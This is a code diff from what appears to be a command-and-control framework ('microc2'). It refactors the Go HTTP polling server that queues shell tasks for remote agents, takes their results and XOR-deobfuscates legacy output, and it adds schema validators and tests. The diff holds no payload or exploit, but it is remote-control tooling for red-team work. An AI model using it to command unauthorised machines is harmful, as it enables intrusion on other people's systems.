+        ['completed_at', 'result']
+    ),
+    ...forbiddenStateCases(
+        'cancelled',
+        cancelledTask,
+        ['dispatched_at', 'started_at', 'result']
+    ),
+    ...forbiddenStateCases(
+        'expired',
+        expiredDispatchedTask,
+        ['started_at', 'result']
+    )
+];
+
+for (const testCase of negativeCases) {
+    const validate = ajv.getSchema(schemaID(testCase.schema));
+    if (!validate || validate(testCase.value)) {
+        console.error(`Schema contract failed negative case: ${testCase.name}`);
+        failed = true;
+    }
+}
+
+const semanticResultExamples = [
+    {name: 'completed result example', value: completedResult},
+    {name: 'failed result example', value: failedResult},
+    {
+        name: 'task page result summary',
+        value: readJSON(path.join(exampleDirectory, 'task-page-v1.json')).tasks[0].result
+    }
+];
+for (const testCase of semanticResultExamples) {
+    const error = validateResultTimeline(testCase.value);
+    if (error) {
+        console.error(`Result timeline failed for ${testCase.name}: ${error}`);
+        failed = true;
+    }
+}
+
+const statusTimestampError = validateStatusTimestamp(runningStatusUpdate);
+if (statusTimestampError) {
+    console.error(`Status timestamp failed for running status example: ${statusTimestampError}`);
+    failed = true;
+}
+
+const semanticNegativeCases = [
+    {
+        name: 'result completion precedes start',
+        value: {
+            ...completedResult,
+            completed_at: '2026-07-23T16:30:04Z'
+        }
+    },
+    {
+        name: 'result rejects the zero start instant',
+        value: {
+            ...completedResult,
+            started_at: '0001-01-01T00:00:00Z'
+        }
+    },
+    {
+        name: 'result rejects the zero completion instant',
+        value: {
+            ...completedResult,
+            completed_at: '0001-01-01T00:00:00Z'
+        }
+    }
+];
+for (const testCase of semanticNegativeCases) {
+    if (!validateResultTimeline(testCase.value)) {
+        console.error(`Semantic contract failed negative case: ${testCase.name}`);
+        failed = true;
+    }
+}
+
+const semanticStatusNegativeCases = [
+    {
+        name: 'status update rejects the zero timestamp instant',
+        value: {
+            ...runningStatusUpdate,
+            timestamp: '0001-01-01T00:00:00Z'
+        }
+    }
+];
+for (const testCase of semanticStatusNegativeCases) {
+    if (!validateStatusTimestamp(testCase.value)) {
+        console.error(`Semantic contract failed negative case: ${testCase.name}`);
+        failed = true;
+    }
+}
+
+if (failed) {
+    process.exitCode = 1;
+} else {
+    console.log(
+        `Validated ${exampleFiles.length} examples, ${lifecyclePositiveCases.length} lifecycle states, ${negativeCases.length} schema-negative cases, and ${semanticNegativeCases.length + semanticStatusNegativeCases.length} semantic-negative cases against ${schemaFiles.length} Draft 2020-12 schemas.`
+    );
+}
+
+function readJSON(file) {
+    return JSON.parse(fs.readFileSync(file, 'utf8'));
+}
+
+function schemaID(file) {
+    return `https://microc2.local/schemas/${file}`;
+}
+
+function withoutProperty(value, property) {
+    const clone = {...value};
+    delete clone[property];
+    return clone;
+}
+
+function forbiddenStateCases(state, value, properties) {
+    return properties.map(property => ({
+        name: `${state} task forbids ${property}`,
+        schema: 'task-v1.schema.json',
+        value: {
+            ...value,
+            [property]: forbiddenLifecycleValue(property)
+        }
+    }));
+}
+
+function forbiddenLifecycleValue(property) {
+    if (property === 'result') {
+        return completedResult;
+    }
+    return '2026-07-23T16:30:02Z';
+}
+
+function taskPageWithResultOutput() {
+    const page = readJSON(path.join(exampleDirectory, 'task-page-v1.json'));
+    return {
+        ...page,
+        tasks: page.tasks.map(task => ({
+            ...task,
+            result: {
+                ...task.result,
+                output: {
+                    stdout: 'must not be listed',
+                    stderr: ''
+                }
+            }
+        }))
+    };
+}
+
+function validateResultTimeline(result) {
+    const startedAt = Date.parse(result.started_at);
+    const completedAt = Date.parse(result.completed_at);
+    if (!Number.isFinite(startedAt) || !Number.isFinite(completedAt)) {
+        return 'timestamps must be valid RFC3339 instants';
+    }
+    const zeroInstant = Date.parse('0001-01-01T00:00:00Z');
+    if (startedAt === zeroInstant) {
+        return 'started_at must not be the zero instant';
+    }
+    if (completedAt === zeroInstant) {
+        return 'completed_at must not be the zero instant';
+    }
+    if (completedAt < startedAt) {
+        return 'completed_at must not precede started_at';
+    }
+    return '';
+}
+
+function validateStatusTimestamp(update) {
+    const timestamp = Date.parse(update.timestamp);
+    if (!Number.isFinite(timestamp)) {
+        return 'timestamp must be a valid RFC3339 instant';
+    }
+    if (timestamp === Date.parse('0001-01-01T00:00:00Z')) {
+        return 'timestamp must not be the zero instant';
+    }
+    return '';
+}

--- a/server/internal/behaviour/http_polling.go
+++ b/server/internal/behaviour/http_polling.go
@@ -3,11 +3,13 @@ package behaviour
 
 import (
 	"encoding/json"
+	"errors"
 	"fmt"
 	"io"
 	"log"
 	"microc2/server/internal/common"
 	"microc2/server/internal/filestore"
+	"microc2/server/internal/tasks"
 	"net/http"
 	"os"
 	"path/filepath"
@@ -18,13 +20,10 @@ import (
 )
 
 type HTTPPollingProtocol struct {
-	config   common.BaseProtocolConfig
-	mux      *http.ServeMux
-	commands struct {
-		sync.Mutex
-		queue map[string][]string // AgentID -> []command
-	}
-	results struct {
+	config    common.BaseProtocolConfig
+	mux       *http.ServeMux
+	taskStore *tasks.Store
+	results   struct {
 		sync.Mutex
 		history map[string][]CommandResult // AgentID -> []CommandResult
 	}
@@ -54,14 +53,14 @@ type Agent struct {
 // NewHTTPPollingProtocol creates a new HTTP polling protocol instance
 func NewHTTPPollingProtocol(config common.BaseProtocolConfig) *HTTPPollingProtocol {
 	p := &HTTPPollingProtocol{
-		config: config,
-		mux:    http.NewServeMux(),
+		config:    config,
+		mux:       http.NewServeMux(),
+		taskStore: tasks.NewStore(),
 		agents: struct {
 			sync.Mutex
 			list map[string]*Agent
 		}{list: make(map[string]*Agent)},
 	}
-	p.commands.queue = make(map[string][]string)
 	p.results.history = make(map[string][]CommandResult)
 	p.registerRoutes()
 	return p
@@ -90,50 +89,58 @@ func (p *HTTPPollingProtocol) GetHTTPHandler() http.Handler {
 func (p *HTTPPollingProtocol) handleAgentRequests(w http.ResponseWriter, r *http.Request) {
 	p.enableCors(w, r)
 
-	// log.Printf("[DEBUG] HandleAgentRequests called: %s %s", r.Method, r.URL.Path)
-
-	// Handle preflight OPTIONS requests
 	if r.Method == http.MethodOptions {
 		w.WriteHeader(http.StatusOK)
 		return
 	}
 
-	// Extract agent ID and action from path
-	// Expected format: /api/agent/{AgentID}/{action}
-	parts := strings.Split(r.URL.Path, "/")
-	if len(parts) < 5 {
-		log.Printf("[ERROR] Invalid request path: %s", r.URL.Path)
+	parts := strings.Split(strings.Trim(r.URL.Path, "/"), "/")
+	if len(parts) < 4 || parts[0] != "api" || parts[1] != "agent" {
 		http.Error(w, "Invalid request path", http.StatusBadRequest)
 		return
 	}
-
-	AgentID := parts[3]
-	action := parts[4]
-	if AgentID == "" || action == "" {
-		log.Printf("[ERROR] Invalid request path with empty agent ID or action")
-		http.Error(w, "Invalid request path", http.StatusBadRequest)
+	agentID := parts[2]
+	if err := tasks.ValidateIdentifier("agent_id", agentID); err != nil {
+		writeTaskError(w, err)
 		return
 	}
-
-	// log.Printf("[DEBUG] Handling %s request from agent %s", action, AgentID)
-
+	action := parts[3]
 	switch action {
 	case "heartbeat":
-		p.handleAgentHeartbeat(w, r, AgentID)
+		if len(parts) != 4 {
+			http.Error(w, "Invalid request path", http.StatusBadRequest)
+			return
+		}
+		p.handleAgentHeartbeat(w, r, agentID)
 	case "tasks":
-		p.handleAgentTasks(w, r, AgentID)
+		switch {
+		case len(parts) == 4:
+			p.handleAgentTasks(w, r, agentID)
+		case len(parts) == 6 && parts[5] == "status":
+			p.handleAgentTaskStatus(w, r, agentID, parts[4])
+		default:
+			http.Error(w, "Invalid task request path", http.StatusBadRequest)
+		}
 	case "results":
-		p.handleAgentResults(w, r, AgentID)
+		if len(parts) != 4 {
+			http.Error(w, "Invalid request path", http.StatusBadRequest)
+			return
+		}
+		p.handleTypedAgentResult(w, r, agentID)
 	case "command":
-		// Agent polling for next command
+		if len(parts) != 4 {
+			http.Error(w, "Invalid request path", http.StatusBadRequest)
+			return
+		}
 		p.handleGetCommand(w, r)
-		return
 	case "result":
-		// Agent submitting command result
-		p.handleAgentResults(w, r, AgentID)
-		return
+		if len(parts) != 4 {
+			http.Error(w, "Invalid request path", http.StatusBadRequest)
+			return
+		}
+		p.handleLegacyAgentResult(w, r, agentID)
 	default:
-		log.Printf("[ERROR] Unknown action %s from agent %s", action, AgentID)
+		log.Printf("[ERROR] Unknown action %s from agent %s", action, agentID)
 		http.Error(w, "Unknown action", http.StatusNotFound)
 	}
 }
@@ -186,65 +193,103 @@ func (p *HTTPPollingProtocol) handleAgentHeartbeat(w http.ResponseWriter, r *htt
 	w.Write(respBytes)
 }
 
-func (p *HTTPPollingProtocol) handleAgentTasks(w http.ResponseWriter, r *http.Request, AgentID string) {
+func (p *HTTPPollingProtocol) handleAgentTasks(w http.ResponseWriter, r *http.Request, agentID string) {
 	if r.Method != http.MethodGet {
 		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
 		return
 	}
 
-	// log.Printf("[DEBUG] Agent %s requesting tasks", AgentID)
+	task, ok, err := p.taskStore.DispatchNext(agentID)
+	if err != nil {
+		writeTaskError(w, err)
+		return
+	}
+	if !ok {
+		w.WriteHeader(http.StatusNoContent)
+		return
+	}
 
-	// For now, return empty task list
 	w.Header().Set("Content-Type", "application/json")
-	json.NewEncoder(w).Encode([]interface{}{})
+	if err := json.NewEncoder(w).Encode(task); err != nil {
+		log.Printf("[ERROR] Failed to encode task %s for agent %s: %v", task.ID, agentID, err)
+	}
 }
 
-func (p *HTTPPollingProtocol) handleAgentResults(w http.ResponseWriter, r *http.Request, AgentID string) {
-	// log.Printf("[TRACE] Entered handleAgentResults for AgentID=%s, method=%s", AgentID, r.Method)
-
+func (p *HTTPPollingProtocol) handleAgentTaskStatus(w http.ResponseWriter, r *http.Request, agentID, taskID string) {
 	if r.Method != http.MethodPost {
-		log.Printf("[WARN] handleAgentResults: Invalid method %s for agent %s", r.Method, AgentID)
+		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+	if err := tasks.ValidateIdentifier("task_id", taskID); err != nil {
+		writeTaskError(w, err)
+		return
+	}
+
+	var update tasks.StatusUpdate
+	if err := decodeStrictJSON(w, r, &update, tasks.MaxStatusUpdateBodyBytes); err != nil {
+		writeJSONDecodeError(w, "Invalid task status update", err)
+		return
+	}
+	task, err := p.taskStore.MarkRunning(agentID, taskID, update)
+	if err != nil {
+		writeTaskError(w, err)
+		return
+	}
+	writeTaskJSON(w, http.StatusOK, task)
+}
+
+func (p *HTTPPollingProtocol) handleTypedAgentResult(w http.ResponseWriter, r *http.Request, agentID string) {
+	if r.Method != http.MethodPost {
 		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
 		return
 	}
 
-	// Read and process results
-	body, err := io.ReadAll(r.Body)
-	if err != nil {
-		log.Printf("[ERROR] Failed to read results from agent %s: %v", AgentID, err)
-		http.Error(w, "Error reading request body", http.StatusBadRequest)
+	var result tasks.Result
+	if err := decodeStrictJSON(w, r, &result, tasks.MaxTaskResultBodyBytes); err != nil {
+		writeJSONDecodeError(w, "Invalid task result", err)
 		return
 	}
+	task, completion, err := p.taskStore.CompleteWithInfo(agentID, result)
+	if err != nil {
+		writeTaskError(w, err)
+		return
+	}
+	if completion.LegacyOrigin && completion.Applied {
+		p.recordLegacyResultForAgent(agentID, projectTypedTaskToLegacyResult(task))
+	}
+	writeTaskJSON(w, http.StatusOK, task)
+}
 
-	// log.Printf("[TRACE] handleAgentResults: Raw body from agent %s: %s", AgentID, string(body))
-
+func (p *HTTPPollingProtocol) handleLegacyAgentResult(w http.ResponseWriter, r *http.Request, agentID string) {
+	if r.Method != http.MethodPost {
+		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
 	var result CommandResult
-	if err := json.Unmarshal(body, &result); err != nil {
-		log.Printf("[ERROR] Failed to unmarshal CommandResult from agent %s: %v", AgentID, err)
+	if err := decodeStrictJSON(w, r, &result, tasks.MaxLegacyResultBodyBytes); err != nil {
+		writeJSONDecodeError(w, "Invalid result format", err)
+		return
+	}
+	if strings.TrimSpace(result.Command) == "" {
 		http.Error(w, "Invalid result format", http.StatusBadRequest)
 		return
 	}
-	result.Timestamp = time.Now().Format(time.RFC3339)
+	result.Timestamp = time.Now().UTC().Format(time.RFC3339)
 
-	// Deobfuscate the output before logging or storing
-	deobfuscatedOutput, err := common.XORDeobfuscate(result.Output, AgentID)
+	deobfuscatedOutput, err := common.XORDeobfuscate(result.Output, agentID)
 	if err != nil {
-		log.Printf("[AGENT] Failed to deobfuscate result from %s for command '%s': %v. Storing raw output.", AgentID, result.Command, err)
-		// Store the raw output if deobfuscation fails, so it's not lost
+		log.Printf("[AGENT] Failed to deobfuscate legacy result from %s: %v. Storing raw output.", agentID, err)
 	} else {
 		result.Output = deobfuscatedOutput
 	}
 
-	log.Printf("[AGENT] Received result from %s for command '%s': %s", AgentID, result.Command, result.Output)
-
-	p.results.Lock()
-	p.results.history[AgentID] = append(p.results.history[AgentID], result)
-	// log.Printf("[TRACE] handleAgentResults: Results history length for agent %s after append: %d", AgentID, len(p.results.history[AgentID]))
-	p.results.Unlock()
-
-	// Acknowledge receipt
+	if _, matched, err := p.taskStore.CompleteLegacy(agentID, result.Command, result.Output); err != nil {
+		writeTaskError(w, err)
+		return
+	} else if matched {
+		p.recordLegacyResultForAgent(agentID, result)
+	}
 	w.WriteHeader(http.StatusOK)
-	// log.Printf("[TRACE] handleAgentResults: Sent HTTP 200 OK to agent %s", AgentID)
 }
 
 // Start implements the Protocol interface
@@ -287,7 +332,7 @@ func (p *HTTPPollingProtocol) HandleFileDownload(filename string) (io.Reader, er
 func (p *HTTPPollingProtocol) processAgentHeartbeat(agentData []byte, expectedAgentID string) error {
 	var agent Agent
 	if err := json.Unmarshal(agentData, &agent); err != nil {
-		log.Printf("[ERROR] Failed to unmarshal agent data: %v. Data: %s", err, string(agentData))
+		log.Printf("[ERROR] Failed to unmarshal agent heartbeat: %v", err)
 		return fmt.Errorf("failed to unmarshal agent data: %w", err)
 	}
 	if strings.TrimSpace(agent.ID) == "" {
@@ -390,29 +435,27 @@ func (p *HTTPPollingProtocol) handleQueueCommand(w http.ResponseWriter, r *http.
 
 func (p *HTTPPollingProtocol) handleGetCommand(w http.ResponseWriter, r *http.Request) {
 	p.enableCors(w, r)
-	// Extract AgentID from URL: /api/agent/{AgentID}/command
-	parts := strings.Split(r.URL.Path, "/")
-	if len(parts) < 5 {
+	if r.Method != http.MethodGet {
+		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+	parts := strings.Split(strings.Trim(r.URL.Path, "/"), "/")
+	if len(parts) != 4 {
 		http.Error(w, "Invalid request path", http.StatusBadRequest)
 		return
 	}
-	AgentID := parts[3]
-
-	p.commands.Lock()
-	defer p.commands.Unlock()
-	queue := p.commands.queue[AgentID]
-	// log.Printf("[DEBUG] handleGetCommand: AgentID=%s, queueLen=%d", AgentID, len(queue))
-	if len(queue) == 0 {
+	agentID := parts[2]
+	task, ok, err := p.taskStore.DispatchNextLegacy(agentID)
+	if err != nil {
+		writeTaskError(w, err)
+		return
+	}
+	if !ok {
 		w.WriteHeader(http.StatusNoContent)
 		return
 	}
-	cmd := queue[0]
-	p.commands.queue[AgentID] = queue[1:]
-	if len(queue) > 0 {
-		// log.Printf("[DEBUG] handleGetCommand: returning command to agent %s: %s", AgentID, cmd)
-	}
 	w.Header().Set("Content-Type", "application/json")
-	json.NewEncoder(w).Encode(map[string]string{"command": cmd})
+	json.NewEncoder(w).Encode(map[string]string{"command": task.Arguments.Command})
 }
 
 func (p *HTTPPollingProtocol) handleGetResults(w http.ResponseWriter, r *http.Request) {
@@ -528,12 +571,42 @@ func (p *HTTPPollingProtocol) GetAllAgents() map[string]interface{} {
 	return result
 }
 
-// QueueCommand queues a command for a specific agent
-func (p *HTTPPollingProtocol) QueueCommand(AgentID, cmd string) {
-	p.commands.Lock()
-	p.commands.queue[AgentID] = append(p.commands.queue[AgentID], cmd)
-	p.commands.Unlock()
-	log.Printf("[DEBUG] QueueCommand: AgentID=%s, cmd=%s, queueLen=%d", AgentID, cmd, len(p.commands.queue[AgentID]))
+func (p *HTTPPollingProtocol) AgentLastSeen(agentID string) (time.Time, bool) {
+	p.agents.Lock()
+	defer p.agents.Unlock()
+	agent, ok := p.agents.list[agentID]
+	if !ok || agent == nil {
+		return time.Time{}, false
+	}
+	return agent.LastSeen, true
+}
+
+// QueueCommand is the deprecated raw-command adapter. The command is recorded
+// as a typed shell task so both old and v1 agents share one lifecycle store.
+func (p *HTTPPollingProtocol) QueueCommand(agentID, command string) {
+	if _, err := p.taskStore.CreateLegacyShell(agentID, command); err != nil {
+		log.Printf("[WARN] Failed to queue legacy command for agent %s: %v", agentID, err)
+	}
+}
+
+func (p *HTTPPollingProtocol) QueueLegacyShellTask(agentID, command string) (tasks.Task, error) {
+	return p.taskStore.CreateLegacyShell(agentID, command)
+}
+
+func (p *HTTPPollingProtocol) CreateTask(agentID string, request tasks.CreateRequest) (tasks.Task, error) {
+	return p.taskStore.Create(agentID, request)
+}
+
+func (p *HTTPPollingProtocol) ListTasks(agentID string) ([]tasks.Task, error) {
+	return p.taskStore.List(agentID)
+}
+
+func (p *HTTPPollingProtocol) CancelTask(agentID, taskID string) (tasks.Task, error) {
+	return p.taskStore.Cancel(agentID, taskID)
+}
+
+func (p *HTTPPollingProtocol) GetTask(agentID, taskID string) (tasks.Task, error) {
+	return p.taskStore.Get(agentID, taskID)
 }
 
 // Exported method to get results history keys for debugging
@@ -560,8 +633,7 @@ func (p *HTTPPollingProtocol) GetResults(AgentID string) []map[string]interface{
 	history := p.results.history[AgentID]
 	// log.Printf("[DEBUG] Results history for AgentID=%s: %+v", AgentID, history)
 	var results []map[string]interface{}
-	for i, res := range history {
-		log.Printf("[DEBUG] Result %d for AgentID=%s: command=%s, output=%s, timestamp=%s", i, AgentID, res.Command, res.Output, res.Timestamp)
+	for _, res := range history {
 		results = append(results, map[string]interface{}{
 			"command":   res.Command,
 			"output":    res.Output,
@@ -570,4 +642,132 @@ func (p *HTTPPollingProtocol) GetResults(AgentID string) []map[string]interface{
 	}
 	// log.Printf("[DEBUG] Returning %d results for AgentID=%s", len(results), AgentID)
 	return results
+}
+
+// GetResultsPage returns a bounded slice of deprecated command results and the
+// total retained count. The slice is copied while holding the result lock, so
+// callers never need to materialize or race over the full listener history.
+func (p *HTTPPollingProtocol) GetResultsPage(
+	agentID string,
+	offset int,
+	limit int,
+) ([]map[string]interface{}, int) {
+	p.results.Lock()
+	defer p.results.Unlock()
+
+	history := p.results.history[agentID]
+	total := len(history)
+	if offset < 0 {
+		offset = 0
+	}
+	if offset > total {
+		offset = total
+	}
+	if limit < 0 {
+		limit = 0
+	}
+	available := total - offset
+	if limit > available {
+		limit = available
+	}
+	end := offset + limit
+	results := make([]map[string]interface{}, 0, limit)
+	for _, result := range history[offset:end] {
+		results = append(results, map[string]interface{}{
+			"command":   result.Command,
+			"output":    result.Output,
+			"timestamp": result.Timestamp,
+		})
+	}
+	return results, total
+}
+
+func (p *HTTPPollingProtocol) recordLegacyResultForAgent(agentID string, result CommandResult) {
+	p.results.Lock()
+	defer p.results.Unlock()
+	history := p.results.history[agentID]
+	if len(history) >= tasks.MaxTaskHistoryPerAgent {
+		history = append([]CommandResult(nil), history[len(history)-tasks.MaxTaskHistoryPerAgent+1:]...)
+	}
+	p.results.history[agentID] = append(history, result)
+}
+
+func projectTypedTaskToLegacyResult(task tasks.Task) CommandResult {
+	result := CommandResult{
+		Command: task.Arguments.Command,
+	}
+	if task.CompletedAt != nil {
+		result.Timestamp = task.CompletedAt.UTC().Format(time.RFC3339)
+	} else {
+		result.Timestamp = time.Now().UTC().Format(time.RFC3339)
+	}
+	if task.Result != nil {
+		result.Output = task.Result.Output.Stdout + task.Result.Output.Stderr
+		if task.Result.Outcome == tasks.OutcomeFailed && task.Result.Error != "" {
+			errorOutput := task.Result.Error
+			if !strings.HasPrefix(strings.TrimSpace(errorOutput), "Error:") {
+				errorOutput = "Error: " + errorOutput
+			}
+			if result.Output == "" {
+				result.Output = errorOutput
+			} else {
+				result.Output += "\n" + errorOutput
+			}
+		}
+	}
+	return result
+}
+
+func decodeStrictJSON(
+	w http.ResponseWriter,
+	r *http.Request,
+	destination interface{},
+	maxBytes int64,
+) error {
+	r.Body = http.MaxBytesReader(w, r.Body, maxBytes)
+	decoder := json.NewDecoder(r.Body)
+	decoder.DisallowUnknownFields()
+	if err := decoder.Decode(destination); err != nil {
+		return err
+	}
+	var trailing interface{}
+	if err := decoder.Decode(&trailing); !errors.Is(err, io.EOF) {
+		if err == nil {
+			return fmt.Errorf("request body must contain exactly one JSON value")
+		}
+		return err
+	}
+	return nil
+}
+
+func writeJSONDecodeError(w http.ResponseWriter, message string, err error) {
+	var maxBytesError *http.MaxBytesError
+	if errors.As(err, &maxBytesError) {
+		http.Error(w, message+": request body too large", http.StatusRequestEntityTooLarge)
+		return
+	}
+	http.Error(w, message+": "+err.Error(), http.StatusBadRequest)
+}
+
+func writeTaskError(w http.ResponseWriter, err error) {
+	switch {
+	case tasks.IsValidationError(err):
+		http.Error(w, err.Error(), http.StatusBadRequest)
+	case errors.Is(err, tasks.ErrNotFound):
+		http.Error(w, err.Error(), http.StatusNotFound)
+	case errors.Is(err, tasks.ErrInvalidTransition):
+		http.Error(w, err.Error(), http.StatusConflict)
+	case errors.Is(err, tasks.ErrCapacity):
+		http.Error(w, err.Error(), http.StatusTooManyRequests)
+	default:
+		http.Error(w, "Task operation failed", http.StatusInternalServerError)
+	}
+}
+
+func writeTaskJSON(w http.ResponseWriter, status int, value interface{}) {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(status)
+	if err := json.NewEncoder(w).Encode(value); err != nil {
+		log.Printf("[ERROR] Failed to encode task response: %v", err)
+	}
 }

--- a/server/internal/behaviour/http_polling.go
+++ b/server/internal/behaviour/http_polling.go
@@ -140,7 +140,7 @@ func (p *HTTPPollingProtocol) handleAgentRequests(w http.ResponseWriter, r *http
 		}
 		p.handleLegacyAgentResult(w, r, agentID)
 	default:
-		log.Printf("[ERROR] Unknown action %s from agent %s", action, agentID)
+		log.Print("[ERROR] Unknown agent action")
 		http.Error(w, "Unknown action", http.StatusNotFound)
 	}
 }
@@ -312,8 +312,8 @@ func (p *HTTPPollingProtocol) HandleFileUpload(filename string, fileData io.Read
 	if err := filestore.ValidateFileName(filename); err != nil {
 		return err
 	}
-	filepath := filepath.Join(p.config.UploadDir, filename)
-	file, err := os.Create(filepath)
+	filePath := filepath.Join(p.config.UploadDir, filename)
+	file, err := os.Create(filePath)
 	if err != nil {
 		return err
 	}
@@ -593,8 +593,8 @@ func (p *HTTPPollingProtocol) QueueLegacyShellTask(agentID, command string) (tas
 	return p.taskStore.CreateLegacyShell(agentID, command)
 }
 
-func (p *HTTPPollingProtocol) CreateTask(agentID string, request tasks.CreateRequest) (tasks.Task, error) {
-	return p.taskStore.Create(agentID, request)
+func (p *HTTPPollingProtocol) CreateTask(agentID string, createRequest tasks.CreateRequest) (tasks.Task, error) {
+	return p.taskStore.Create(agentID, createRequest)
 }
 
 func (p *HTTPPollingProtocol) ListTasks(agentID string) ([]tasks.Task, error) {

--- a/server/internal/behaviour/http_polling_test.go
+++ b/server/internal/behaviour/http_polling_test.go
@@ -4,10 +4,14 @@ import (
 	"bytes"
 	"encoding/hex"
 	"encoding/json"
+	"fmt"
 	"microc2/server/internal/common"
+	"microc2/server/internal/tasks"
 	"net/http"
 	"net/http/httptest"
+	"strings"
 	"testing"
+	"time"
 )
 
 func TestHTTPPollingProtocolAgentLifecycle(t *testing.T) {
@@ -92,6 +96,422 @@ func TestHTTPPollingProtocolAgentLifecycle(t *testing.T) {
 	}
 }
 
+func TestHTTPPollingProtocolTypedTaskLifecycle(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{UploadDir: t.TempDir(), Port: "0"})
+	handler := proto.GetHTTPHandler()
+	agentID := "agent-one"
+	expiresIn := 300
+
+	queued, err := proto.CreateTask(agentID, tasks.CreateRequest{
+		SchemaVersion:    tasks.SchemaVersion,
+		Type:             tasks.TypeShell,
+		Arguments:        tasks.ShellArguments{Command: "whoami"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("queue typed task: %v", err)
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/"+agentID+"/tasks", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected task dispatch 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+	var dispatched tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &dispatched); err != nil {
+		t.Fatalf("decode dispatched task: %v", err)
+	}
+	if dispatched.ID != queued.ID || dispatched.Status != tasks.StatusDispatched {
+		t.Fatalf("unexpected dispatched task: %#v", dispatched)
+	}
+
+	startedAt := dispatched.DispatchedAt.Add(time.Second)
+	statusBody, err := json.Marshal(tasks.StatusUpdate{
+		SchemaVersion: tasks.SchemaVersion,
+		TaskID:        dispatched.ID,
+		AgentID:       agentID,
+		Status:        tasks.StatusRunning,
+		Timestamp:     startedAt,
+	})
+	if err != nil {
+		t.Fatalf("marshal status update: %v", err)
+	}
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/"+agentID+"/tasks/"+dispatched.ID+"/status",
+		bytes.NewReader(statusBody),
+	)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected running update 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	exitCode := 0
+	resultBody, err := json.Marshal(tasks.Result{
+		SchemaVersion: tasks.SchemaVersion,
+		TaskID:        dispatched.ID,
+		AgentID:       agentID,
+		Outcome:       tasks.OutcomeCompleted,
+		StartedAt:     startedAt,
+		CompletedAt:   startedAt.Add(time.Second),
+		ExitCode:      &exitCode,
+		Output:        tasks.Output{Stdout: "operator\n", Stderr: ""},
+	})
+	if err != nil {
+		t.Fatalf("marshal task result: %v", err)
+	}
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(http.MethodPost, "/api/agent/"+agentID+"/results", bytes.NewReader(resultBody))
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected task result 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+	var completed tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &completed); err != nil {
+		t.Fatalf("decode completed task: %v", err)
+	}
+	if completed.Status != tasks.StatusCompleted || completed.Result == nil ||
+		completed.Result.Output.Stdout != "operator\n" {
+		t.Fatalf("unexpected completed task: %#v", completed)
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(http.MethodGet, "/api/agent/"+agentID+"/tasks", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusNoContent {
+		t.Fatalf("expected empty typed queue 204, got %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
+func TestHTTPPollingProtocolTypedTaskRejectsInvalidUpdates(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{UploadDir: t.TempDir(), Port: "0"})
+	handler := proto.GetHTTPHandler()
+	expiresIn := 300
+	task, err := proto.CreateTask("agent-one", tasks.CreateRequest{
+		SchemaVersion:    tasks.SchemaVersion,
+		Type:             tasks.TypeShell,
+		Arguments:        tasks.ShellArguments{Command: "whoami"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("queue typed task: %v", err)
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/agent-one/tasks", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("dispatch typed task: %d: %s", rec.Code, rec.Body.String())
+	}
+	var dispatched tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &dispatched); err != nil {
+		t.Fatalf("decode dispatched task: %v", err)
+	}
+
+	mismatch := `{"schema_version":1,"task_id":"` + task.ID +
+		`","agent_id":"agent-two","status":"running","timestamp":"` +
+		dispatched.DispatchedAt.Add(time.Second).Format(time.RFC3339Nano) + `"}`
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/agent-one/tasks/"+task.ID+"/status",
+		bytes.NewBufferString(mismatch),
+	)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusBadRequest {
+		t.Fatalf("expected mismatched agent 400, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	withUnknownField := `{"schema_version":1,"task_id":"` + task.ID +
+		`","agent_id":"agent-one","status":"running","timestamp":"` +
+		dispatched.DispatchedAt.Add(time.Second).Format(time.RFC3339Nano) + `","extra":true}`
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/agent-one/tasks/"+task.ID+"/status",
+		bytes.NewBufferString(withUnknownField),
+	)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusBadRequest {
+		t.Fatalf("expected unknown field 400, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	resultBeforeRunning := `{"schema_version":1,"task_id":"` + task.ID +
+		`","agent_id":"agent-one","outcome":"completed","started_at":"` +
+		dispatched.DispatchedAt.Add(time.Second).Format(time.RFC3339Nano) +
+		`","completed_at":"` + dispatched.DispatchedAt.Add(2*time.Second).Format(time.RFC3339Nano) +
+		`","exit_code":0,"output":{"stdout":"","stderr":""}}`
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(http.MethodPost, "/api/agent/agent-one/results", bytes.NewBufferString(resultBeforeRunning))
